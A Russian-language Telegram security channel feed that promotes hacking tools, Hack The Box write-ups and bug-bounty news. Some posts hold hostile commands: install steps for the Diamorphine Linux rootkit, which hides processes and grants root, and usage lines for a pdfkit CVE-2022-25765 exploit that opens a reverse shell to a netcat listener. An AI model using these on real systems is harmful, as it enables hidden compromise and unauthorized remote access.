Путь до хакера | Cyber security
1.02K subscribers
71 photos
2 videos
17 files
139 links
Блог об информационной безопасности 👾

Всё, что тебе нужно, здесь: https://github.com/artroneee/Cyber-Security-Collection

По всем вопросам:
@artrone
@cherepawwka
Download Telegram
Путь до хакера | Cyber security pinned «🔥Супер полезный репозиторий на GitHub'e🔥 Коллекция списков, руководств, шпаргалок, блогов, лайфхаков, однострочников, cli/веб-инструментов и многого другого😎 Подробнее: https://github.com/trimstray/the-book-of-secret-knowledge #полезные_материалы #литература»
CVE-2023-25136 Proof-of-Concept
DoS-доказательство концепции двойного освобождения OpenSSH 9.1p1 CVE-2023-25136.
Это вызовет двойное освобождение и приведет к аварийному завершению

Подробнее: https://github.com/jfrog/jfrog-CVE-2023-25136-OpenSSH_Double-Free
#CVE
Diamorphine — это руткит LKM для ядер Linux 2.6.x/3.x/4.x/5.x и ARM64.

Функции:
🪄При загрузке модуль запускается невидимым;
🪄Скрыть/показать любой процесс, отправив сигнал 31;
🪄Отправка сигнала 63 (любому pid) делает модуль (не)видимым;
🪄Отправка сигнала 64 (любому pid) делает данного пользователя root;
🪄Файлы или каталоги, начинающиеся с MAGIC_PREFIX, становятся невидимыми;

Установка:
git clone https://github.com/m0nad/Diamorphine
cd Diamorphine
make
insmod diamorphine.ko (от рута)

Подробнее: https://github.com/m0nad/Diamorphine
#софт
💉Получен root для тачки Inject💉
Райтап постараюсь сделать сегодня
#hack_the_box #новости
Кстати, HTB запустила "Сезон открытого бета-тестирования"
Это что-то типо соревнований с рейтингом, который набирается за взлом тачек
За каждое звание от Bronze до Holo в конце сезона, который длится 3 месяца, выдаются свои плюшки
Сюда я буду выкатывать райтапы некоторых из этих тачек, поэтому вы также сможете получить призы😉
#новости #hack_the_box
💉Райтап на тачку Inject💉

Читать: https://teletype.in/@hackerblog/1mllvEhUJhW

#райтап #hack_the_box
На 1к подписчиков планируется провести ребрендинг канала
Как смотрите на это?
P.S под «ребрендингом» я подразумеваю смену названия и авы канала
Anonymous Poll
57%
Давай
43%
Лучше не надо
Privileger
Privileger позволяет вам максимально просто работать с привилегиями в ОС Windows. Присутствуют следующие режимы:
◽️Добавить привилегии аккаунту.
◽️Запустить процесс, добавив в его токен конкретную привилегию.
◽️Удалить у пользователя привилегию.
◽️Режим поиска. Позволяет обнаруживать на конкретном компьютере объекты, обладающие какой-либо привилегией.
◽️Перечислить все привилегии, которые назначены конкретному аккаунту.

Подробнее: https://github.com/MzHmO/Privileger

#софт
PDFkit-CMD-Injection (CVE-2022-25765)

Эксплойт для внедрения команды CVE-2022-25765 в pdfkit < 0.8.6

Использование:
nc -lvnp 1337
./CVE-2022-25765.py -t http://localhost -a 10.10.14.122 -p 1337


Флаги:
-t, --target Адрес цели в http-формате
-a, --addr Адрес для обратного соединения
-p, --port Порт для обратного соединения (9001 стандартно)

Подробнее: https://security.snyk.io/vuln/SNYK-RUBY-PDFKIT-2869795
#CVE
Forwarded from SecurityLab.ru
Принятие законопроекта о "белых хакерах" в России, предлагающего ввести понятие bug bounty в правовое поле и изменения в Уголовный кодекс, может быть отложено из-за недовольства ФСБ и ФСТЭК. Силовые ведомства выступают против либерализации положений УК и высказали соответствующую позицию на рабочих совещаниях по законопроекту.

#белыехакеры #bugbounty #Уголовныйкодекс #ФСБ #ФСТЭК
Получен рут на тачке Socket📍

Райтап на днях
#новости #hack_the_box